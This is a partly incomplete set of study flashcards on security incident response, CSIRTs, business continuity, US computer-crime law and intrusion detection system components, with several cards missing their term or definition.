Term
| what % of concentrated attacks are successful? |
|
Definition
|
|
Term
| what are the four categories of event severity? |
|
Definition
false alarms
minor incidents
major incidents
disasters |
|
|
Term
|
Definition
| situations that seem to be incidents, or potential incidents, but are actually innocent activities |
|
|
Term
| in almost all IDSs a large majority of suspicious activities are actually ___ |
|
Definition
|
|
Term
|
Definition
| true "breaches" that the on duty staff can handle and have no further implications for the firm |
|
|
Term
|
Definition
| incidents that have an impact too large for the on duty IT staff to handle. |
|
|
Term
| what are the IT incident response teams for major incidents? |
|
Definition
| Computer Security Incident Response Teams (CSIRTs) |
|
|
Term
| What is the organization of a CSIRT? |
|
Definition
Senior manager to ID business decisions
memebers from affected line organizations
PR
Legal
HR |
|
|
Term
|
Definition
| events which threaten the business continuity (day to day revenue generating operations of the firm) |
|
|
Term
| what is business continuity planning? |
|
Definition
| plans that keeps a business running or getting it back in operation as quickly as possible. |
|
|
Term
| what are the four key components of responding to an event? |
|
Definition
speed
accuracy
planning
rehearsal |
|
|
Term
|
Definition
| reacting to incidents according to plan |
|
|
Term
| what are the types of rehearsals? describe them |
|
Definition
walk through: simplest type. Managers and key personnel and discuss their roles step by step
Live Tests: have teams actually take the actions instead of describing them |
|
|
Term
| a walk through is also known as ___ |
|
Definition
|
|
Term
| what are the three priorities at the beginning of an incident? |
|
Definition
detection
analysis
escalate |
|
|
Term
| who frequently identifies an attack? |
|
Definition
| non-technical employees due to seeing a failed/malfunctioning system |
|
|
Term
| much of the intrusion analysis is done by ___ |
|
Definition
| reading through log files for the time period in which the incident probably began |
|
|
Term
| what is an issue with blackholing the attacker? |
|
Definition
| they know they have been detected and may return through another, more stealthy, attack vector |
|
|
Term
| what are some of the key objectives during recovery from an incident? |
|
Definition
ID and close backdoors and other problems
restore systems to operation |
|
|
Term
| what is a risk during recovery after an attack |
|
Definition
attacker may have left backdoors
trojans
viruses
registry root kits.
It may be difficult to remove these: might miss one/some |
|
|
Term
| most companies are more likely to punish an ___ than to try to prosecute an ___ |
|
Definition
|
|
Term
| what should be examined before prosecuting an attacker? |
|
Definition
cost and effort
probability of success
loss of reputation |
|
|
Term
| what is forensics evidence? |
|
Definition
| evidence that is admissible in court |
|
|
Term
| regarding forensics evidence, what are the steps that should be done. |
|
Definition
call FBI and police during the attack.
use certified forensics expert
preserve evidence
document chain of custody |
|
|
Term
| A ___ should be done after an attack to ID what went well and what should be changed |
|
Definition
|
|
Term
| cyber law is dealing with ___ |
|
Definition
|
|
Term
| What are the types of courts? |
|
Definition
US district courts: Lowest level. 94 districts in the US
U.S. circuit court of appeal: no trials. selectively review decisions made at lower courts
supreme court: sees 100 or so cases per year |
|
|
Term
| in the federal court system, the rules for the admissibility of evidence are codified in___ |
|
Definition
| federal rules of evidence |
|
|
Term
| federal law regarding hacking is ___ |
|
Definition
| US code title 18, part I, section 1030 |
|
|
Term
| what are classified as protected computers |
|
Definition
government
financial institution
any computer used for interstate or foreign commerce/communications |
|
|
Term
| what is a damage threshold? |
|
Definition
| minimum amounts of damage that must occur before attackers are in violation of the law |
|
|
Term
| what are the Four major functions of an IDS? |
|
Definition
logging
automated analysis by the IDS
administrator actions
management |
|
|
Term
| what falls under the "action" function of the IDS? |
|
Definition
generate alarms
generate log summary reports
support interactive manual log analysis |
|
|
Term
| what falls under the "management" function of the IDS? |
|
Definition
|
|
Term
| what falls under the "automated analysis" function of the IDS? |
|
Definition
| attack signatures vs anomaly detection |
|
|
Term
| what falls under the "event logging" function of the IDS? |
|
Definition
| individual events are time stamped logs as flat file of events sometimes data aggregation from multiple IDSs |
|
|
Term
| what are the components of a distributed IDS? |
|
Definition
Agent: collects event data and stores log files on monitoring devices
manager & integrated log file: Manger program is responsible for integrating the info from multiple agents and combine it into a single integrated log file |
|
|
Term
| discuss batch vs real time transfer in integrated IDSs |
|
Definition
batch is least expensive. Agent waits several minutes or hours then sends log file to the manager.
real time: each events that goes to the manager immediately |
|
|
Term
| Communication between agents and manager should be ___ |
|
Definition
| secure with authentication, integrity checking, confidentiality and anti-replay protection |
|
|
Term
| what are the two type of agents regarding IDS |
|
Definition
|
|
Term
| ___ captures packets as they travel through a network |
|
Definition
|
|
Term
| ___ are boxes located at various points in the network to capture packets |
|
Definition
|
|
Term
| NIDS ___ scan encrypted data |
|
Definition
|
|
Term
| what is the most critical hosts on a network? What works on data collected on the host computer to ID possible attacks |
|
Definition
|
|
Term
| What is the Network Time Protocol |
|
Definition
| allows synchronization of time stamps on logged events |
|
|
Term
| What is precision in an IDS |
|
Definition
| tuning an IDS so it reports all attack events and as few false alarms as positives. |
|
|
Term
| how do you tune an IDS for precision? |
|
Definition
turn off unnecessary rules
update attack signatures |
|
|
Term
| what are the basic principles of business continuity management |
|
Definition
protect people first
realize people have reduced capacity in decision making during a crisis
avoid rigidity
communication |
|
|
Term
|
Definition
| a backup site that is fully functioning in an emergency. has power, HVAC, hardware, software an up to date data |
|
|
Term
|
Definition
| backup sites that offers power and HVAC, but are empty with just internet/phone connections |
|
|
Term
| what equipment probably holds most of a firm's data? |
|
Definition
|
|
